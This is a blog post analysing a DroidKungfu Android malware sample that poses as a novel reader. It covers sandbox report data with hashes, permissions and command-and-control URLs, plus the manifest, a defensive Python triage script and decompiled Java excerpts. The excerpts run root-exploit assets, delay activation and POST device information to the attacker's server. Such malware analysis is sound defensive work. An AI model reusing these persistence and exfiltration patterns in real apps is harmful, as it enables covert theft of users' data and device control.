DroidKungfu Malware Family Analysis (Part 1)

Source: Internet | Published by: 淘宝卖家客服 | Editor: 程序博客网 | Time: 2024/06/06 04:20

I only got hold of the malware sample pack today... let's just open one at random and have a look.

So we opened this one: 星辰变全集.

First I submitted it to http://mobilesandbox.org/ and found that a report for it already existed, so let's start with the static analysis report.


APK Infos

Sample SHA256: c98a251054c26468cfbfc6fbaf3bd1a55fdb500045f07eafa1127bed95fc8bc7
Sample MD5: bddf9a9a8769b70f7f5772199b0cacb0
Sample ssdeep: 49152:obInu5AxuRmfTKVbx0Zg0rpMjOYeY94D1ywI8TLYlB5CWug5IP+0RNjQI:obInyOfTKVb6hpzYeY+Do2WqfgO+Yf
APK Name: 02d2e109d16d160f77a645f44314fedcdbcd6e18.apk
Package Name: com.allen.txtxcb
SDK Version: 4
Files inside the APK-package:
META-INF/MANIFEST.MF
META-INF/GOOGLE_I.SF
META-INF/GOOGLE_I.RSA
assets/gjsvro
assets/killall
assets/legacy
assets/ratc
assets/xcb.txt
lib/armeabi/libnative.so
res/drawable-mdpi/bg.png
res/drawable-mdpi/bg1.jpg
res/drawable-mdpi/bg2.jpg
res/drawable-mdpi/bg3.jpg
res/drawable-mdpi/bg4.jpg
res/drawable-mdpi/bg5.jpg
res/drawable-mdpi/bg6.jpg
res/drawable-mdpi/icon.png
res/drawable-mdpi/settingbg.jpg
res/layout/anim_alpha.xml
res/layout/anim_l_to_r.xml
res/layout/anim_r_to_l.xml
res/layout/main.xml
res/layout/mainlarge.xml
res/layout/mainsmall.xml
res/layout/setting.xml
res/layout/viewfile.xml
res/menu/menu.xml
AndroidManifest.xml
classes.dex
resources.arsc


Static Analyzer V1
    -- Report --

Sample SHA256: c98a251054c26468cfbfc6fbaf3bd1a55fdb500045f07eafa1127bed95fc8bc7
Sample MD5: bddf9a9a8769b70f7f5772199b0cacb0
Sample ssdeep: 49152:obInu5AxuRmfTKVbx0Zg0rpMjOYeY94D1ywI8TLYlB5CWug5IP+0RNjQI:obInyOfTKVb6hpzYeY+Do2WqfgO+Yf
Start of Analysis: Sept. 14, 2012, 8:46 a.m.
End of Analysis: Sept. 14, 2012, 8:46 a.m.
Used Features:
android.hardware.location
android.hardware.location.gps
android.hardware.wifi
android.hardware.touchscreen
android.hardware.screen.portrait
Requested Permissions from Android Manifest:
android.permission.INTERNET
android.permission.READ_PHONE_STATE
android.permission.ACCESS_NETWORK_STATE
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.ACCESS_FINE_LOCATION
android.permission.READ_LOGS
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.ACCESS_WIFI_STATE
android.permission.CHANGE_WIFI_STATE
android.permission.INSTALL_PACKAGES
Used Permissions:
android.permission.INTERNET
android.permission.ACCESS_NETWORK_STATE
android.permission.READ_LOGS
android.permission.READ_PHONE_STATE
android.permission.ACCESS_WIFI_STATE
android.permission.CHANGE_WIFI_STATE
android.permission.ACCESS_FINE_LOCATION
Responsible API calls for used Permissions:
java/net/Socket
android/content/Context;->startService
android/net/ConnectivityManager;->getNetworkInfo
java/lang/Runtime;->exec
android/telephony/TelephonyManager;->getDeviceId
android/net/wifi/WifiManager;->getWifiState
android/net/wifi/WifiManager;->setWifiEnabled
android/location/LocationManager;->getLastKnownLocation
Used Intents:
android.intent.action.MAIN
android.intent.category.LAUNCHER
android.intent.action.BATTERY_CHANGED_ACTION
android.intent.action.SIG_STR
android.intent.action.BOOT_COMPLETED
Used Activities:
.txtReader
com.google.ssearch.Dialog
.ViewFileAct_Float
Settings
Potentially dangerous Calls:
printStackTrace
Cipher(AES)
Read/Write External Storage
getSystemService
Execution of external commands
getDeviceId
HttpPost
system/bin/su
getWifiState
setWifiEnabled
getSubscriberId
Used Services and Receiver:
com.google.ssearch.SearchService
com.google.ssearch.Receiver
Used Providers:
Used Networks:
Found URLs:
http://search.gongfu-android.com:8511/search/sayhi.php
http://search.gongfu-android.com:8511/search/getty.php
http://search.gongfu-android.com:8511/search/rpty.php
http://static.youmi.net/files/pic/320.png
http://static.youmi.net/files/pic/176.png
http://static.youmi.net/files/pic/240.png
http://static.youmi.net/files/pic/480.png
http://schemas.android.com/apk/res/
http://gw.youmi.net/reqad
http://gw.youmi.net/prsad
http://gw.youmi.net/clkad
http://gw.youmi.net/effad
http://gw.youmi.net/cacapp
http://ditu.google.cn/staticmap?center=


Now let's start the actual analysis.

First, drag the APK into APKIDE and decompile it, then convert classes.dex into a JAR.

Preparation done.

Below is the information from AndroidManifest.xml:

<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="1" android:versionName="1.0" package="com.allen.txtxcb"
    xmlns:android="http://schemas.android.com/apk/res/android">
    <application android:label="@string/app_name" android:icon="@drawable/icon">
        <activity android:theme="@android:style/Theme.NoTitleBar" android:label="@string/app_name" android:name=".txtReader" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:theme="@android:style/Theme.Dialog" android:name="com.google.ssearch.Dialog" android:configChanges="keyboardHidden|orientation" />
        <service android:name="com.google.ssearch.SearchService" />
        <receiver android:name="com.google.ssearch.Receiver">
            <intent-filter>
                <action android:name="android.intent.action.BATTERY_CHANGED_ACTION" />
                <action android:name="android.intent.action.SIG_STR" />
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <activity android:theme="@android:style/Theme.NoTitleBar" android:name=".ViewFileAct_Float" android:screenOrientation="portrait" />
        <activity android:theme="@android:style/Theme.NoTitleBar" android:name="Settings" android:screenOrientation="portrait" />
        <meta-data android:name="Wooboo_PID" android:value="f3581d02a4324338bba52dd7e4faa94a" />
        <meta-data android:name="Market_ID" android:value="1" />
        <meta-data android:name="GH_APPKEY" android:value="d6a36e24c86f5ecd758629154669f343" />
    </application>
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.READ_LOGS" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.INSTALL_PACKAGES" />
</manifest>

Package name of the program: com.allen.txtxcb

The program has 2 Activities: android.intent.action.MAIN and android.intent.category.LAUNCHER

The program has 3 meta-data entries:

Wooboo_PID    value = "f3581d02a4324338bba52dd7e4faa94a"
Market_ID     value = "1"
GH_APPKEY     value = "d6a36e24c86f5ecd758629154669f343"

The program has 1 Service: com.google.ssearch.SearchService

The program has 1 BroadcastReceiver: com.google.ssearch.Receiver

The program uses the following permissions:

<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.READ_LOGS" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.INSTALL_PACKAGES" />
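As an added example (not code from the original post), here is a small Python triage script that checks a decoded AndroidManifest.xml plus the APK file listing for the indicators this sample shows: the INSTALL_PACKAGES and READ_LOGS permissions, a receiver registered for BOOT_COMPLETED, components declared under com.google.ssearch rather than the app's own package, and the bundled root-exploit assets. The indicator names are taken from the report above; the sample manifest is a constructed, trimmed copy of the one shown.

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.android.com/apk/res/android}"

# Indicators taken from the sample in the post: the root-exploit assets it
# bundles, the high-risk permissions it requests, and its hidden payload package.
SUSPICIOUS_ASSETS = {"assets/killall", "assets/gjsvro", "assets/ratc", "assets/legacy"}
SUSPICIOUS_PERMS = {"android.permission.INSTALL_PACKAGES", "android.permission.READ_LOGS"}
PAYLOAD_PREFIX = "com.google.ssearch"


def triage(manifest_xml, file_list):
    """Findings for a DECODED AndroidManifest.xml (apktool/APKIDE output, not the
    binary AXML) plus the APK file listing. Each finding is one item to review."""
    root = ET.fromstring(manifest_xml)
    app_pkg = root.get("package")
    findings = []
    perms = {p.get(NS + "name") for p in root.iter("uses-permission")}
    for perm in sorted(perms & SUSPICIOUS_PERMS):
        findings.append("requests " + perm)
    # A boot receiver plus a service is the persistence pattern seen in this sample
    for recv in root.iter("receiver"):
        actions = {a.get(NS + "name") for a in recv.iter("action")}
        if "android.intent.action.BOOT_COMPLETED" in actions:
            findings.append("receiver %s restarts on BOOT_COMPLETED" % recv.get(NS + "name"))
    # Components declared under a package other than the app's own package
    for tag in ("activity", "service", "receiver"):
        for comp in root.iter(tag):
            name = comp.get(NS + "name", "")
            if name.startswith(PAYLOAD_PREFIX):
                findings.append("%s %s is not part of %s" % (tag, name, app_pkg))
    for asset in sorted(SUSPICIOUS_ASSETS & set(file_list)):
        findings.append("bundles root-exploit asset " + asset)
    return findings


# Constructed input: a trimmed copy of the manifest shown in the post.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
  package="com.allen.txtxcb"><application>
  <service android:name="com.google.ssearch.SearchService"/>
  <receiver android:name="com.google.ssearch.Receiver"><intent-filter>
    <action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter></receiver>
  </application>
  <uses-permission android:name="android.permission.READ_LOGS"/>
  <uses-permission android:name="android.permission.INSTALL_PACKAGES"/></manifest>"""
SAMPLE_FILES = ["assets/killall", "assets/gjsvro", "assets/ratc", "classes.dex"]

if __name__ == "__main__":
    for line in triage(SAMPLE_MANIFEST, SAMPLE_FILES):
        print(line)
```

Run against the real sample, the file list comes from the APK's zip directory and the manifest from the decompiled output; the script reports eight findings for the constructed input above.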

===================================================================================================================

You can see that SearchService uses MyThread to install the malicious google.ssearch component:

public void run()
{
    ApplicationInfo localApplicationInfo = SearchService.this.getApplicationInfo();
    // Runs the bundled "killall" asset against the app's own data directory
    Utils.runsh("/data/data/" + localApplicationInfo.packageName + "/killall /data/data/" + localApplicationInfo.packageName, "");
    try
    {
        sleep(5000L);
    }
    catch (InterruptedException localInterruptedException)
    {
        // The decompiler rendered this as "break label50": an interrupted sleep simply falls through
    }
    // If /system/bin/gjsvr already exists, run it and exit
    if (new File("/system/bin/gjsvr").exists())
    {
        Utils.runsh("/system/bin/gjsvr", "");
        android.os.Process.killProcess(android.os.Process.myPid());
        return;
    }
    // Otherwise restart the service through "am startservice" and relaunch the host app
    Utils.runsh("am", "startservice -n " + localApplicationInfo.packageName + "/com.google.ssearch.SearchService");
    Intent localIntent = SearchService.this.getBaseContext().getPackageManager().getLaunchIntentForPackage(SearchService.this.getBaseContext().getPackageName());
    localIntent.addFlags(134217728); // FLAG_ACTIVITY_MULTIPLE_TASK
    localIntent.addFlags(4194304);   // FLAG_ACTIVITY_BROUGHT_TO_FRONT
    localIntent.addFlags(65536);     // FLAG_ACTIVITY_NO_ANIMATION
    SearchService.this.startActivity(localIntent);
    android.os.Process.killProcess(android.os.Process.myPid());
}



Analysis of the google.ssearch package

Next, locate the onCreate() method:

public void onCreate()
{
    super.onCreate();
    // "sstimestamp" holds the time of the first run
    SharedPreferences localSharedPreferences = getSharedPreferences("sstimestamp", 0);
    long l1 = localSharedPreferences.getLong("start", 0L);
    long l2 = System.currentTimeMillis();
    if (l1 == 0L)
    {
        // First run: record the start time and exit without doing anything
        SharedPreferences.Editor localEditor = localSharedPreferences.edit();
        localEditor.putLong("start", l2);
        localEditor.commit();
        stopSelf();
        return;
    }
    if (l2 - l1 < 14400000L)
    {
        // Less than 14400000 ms (4 hours) since the first run: stay dormant
        stopSelf();
        return;
    }
    this.mPreferences = getSharedPreferences("permission", 0);
    if (Utils.isConnected(this)) {
        doSearchReport();
    }
    getPermission();
    provideService();
}

Here we can see two long variables declared, with l1 initialised to 0L; if l1 equals 0L, the value of l2 is stored into l1 (written to the "start" preference).

The program uses System.currentTimeMillis() as the value of l2, so let's look up what this function means:

1. Meaning: currentTimeMillis() returns the current time in milliseconds, i.e. the difference, measured in milliseconds, between the current time and midnight, January 1, 1970 UTC. Note that although the unit of the return value is a millisecond, the granularity of the value depends on the underlying operating system and may be larger; for example, many operating systems measure time in units of tens of milliseconds.

2. Uses:

(1) Measuring how long a program runs:

public class TestTime {
    public static void main(String[] args) {
        String str = new String("0");
        long time1 = System.currentTimeMillis();
        for (int i = 0; i < 10000; i++) {
            str += i;
        }
        long time2 = System.currentTimeMillis();
        System.out.println("for循环共用了" + (time2 - time1) + "毫秒。");
    }
}

(2) Controlling thread timing, e.g. a screen refresh rate:

time1 = System.currentTimeMillis();
// the code you want to run
time2 = System.currentTimeMillis();
if (time2 - time1 < 60) {
    try {
        Thread.sleep(60 - (time2 - time1));
    } catch (InterruptedException e) {
    }
}

(3) Generating file names that do not repeat:

import java.text.SimpleDateFormat;
import java.util.Date;

public String getName() {
    String date1 = null;
    SimpleDateFormat sdf1 = new SimpleDateFormat("yyyyMMddHHmmssSSS");
    date1 = sdf1.format(new Date(System.currentTimeMillis())) + ".txt";
    return date1;
}

So here it is presumably being used to work out how long the program has been running (the threshold 14400000L is 4 hours in milliseconds).
Reading further down, it also calls doSearchReport();
Stepping into doSearchReport():
// Excerpt: localArrayList, the list of name/value pairs built earlier in the method, is not shown
for (;;)
{
    HttpPost localHttpPost = new HttpPost("http://search.gongfu-android.com:8511/search/sayhi.php");
    try
    {
        localHttpPost.setEntity(new UrlEncodedFormEntity(localArrayList, "UTF-8"));
        new DefaultHttpClient().execute(localHttpPost).getStatusLine().getStatusCode();
        return;
    }
    catch (Exception localException) {}
    // On failure, append root=0 and try again
    localArrayList.add(new BasicNameValuePair("root", "0"));
}

It POSTs your information to this malicious URL; the site seems to be down now.
It then calls getPermission() and provideService() in turn.
Stepping into each of them: getPermission() calls getPermission1(), getPermission2() or getPermission3(), depending on the situation, to escalate privileges.

Once the malware has obtained the privileges, it calls the provideService() service to do its dirty work.

Its function appears to be stealing the user's privileges, then sending heartbeat packets and continuously polling for and executing commands from the server.

public static boolean isConnected(Context paramContext)
{
    ConnectivityManager localConnectivityManager = (ConnectivityManager)paramContext.getSystemService("connectivity");
    // 1 = ConnectivityManager.TYPE_WIFI
    if (localConnectivityManager.getNetworkInfo(1).isConnected()) {
        return true;
    }
    // 0 = ConnectivityManager.TYPE_MOBILE
    return localConnectivityManager.getNetworkInfo(0).isConnected();
}


Because of length and layout constraints I won't paste the rest of the code; suffice it to say there is a pile of disgusting privacy-stealing functions and functions that poll for and execute server commands. Truly depraved.

